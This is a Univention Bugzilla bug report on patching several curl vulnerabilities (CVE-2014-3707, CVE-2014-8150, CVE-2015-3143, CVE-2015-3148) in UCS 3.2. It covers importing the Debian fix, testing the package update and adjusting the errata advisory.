Univention Bugzilla – Bug 36468
curl: Multiple issues (3.2)
Last modified: 2015-06-17 15:26:35 CEST
Information leak in curl_easy_duphandle() (CVE-2014-3707)
CVE-2014-8150 When libcurl sends a request to a server via a HTTP proxy, it copies the entire URL into the request and sends if off. If the given URL contains line feeds and carriage returns those will be sent along to the proxy too, which allows the program to for example send a separate HTTP request injected embedded in the URL.
* Re-using authenticated connection when unauthenticated (CVE-2015-3143) * Negotiate not treated as connection-oriented (CVE-2015-3148)
Fix available in Debian version 7.21.0-2.1+squeeze12
Followup to Bug 37257
7.21.0-2.1+squeeze12 built as 7.21.0-7.53.201506031709. Advisory: 2015-06-03-curl.yaml
Ok, 7.21.0-2.1+squeeze12 has been imported and built in errata3.2-6. Package update works: previous version: libcurl3 7.21.0-6.48.201410151452 new version: libcurl3 7.21.0-7.53.201506031709 (via patches/curl/3.2-0-0-ucs/7.21.0-2.1+squeeze12-errata3.2-6/bump-version.patch) Version in UCS 4.0-0 is still higher: libcurl3 7.26.0-1.49.201411010317 Advisory is ok, probably we also should add "5" to the updatable versions?: version: [5,6] I guess we are still in the 6 weeks maintenance time frame after a patch level release. Otherwise ok.
(In reply to Arvid Requate from comment #6) > version: [5,6] Changed
<http://errata.univention.de/ucs/3.2/339.html>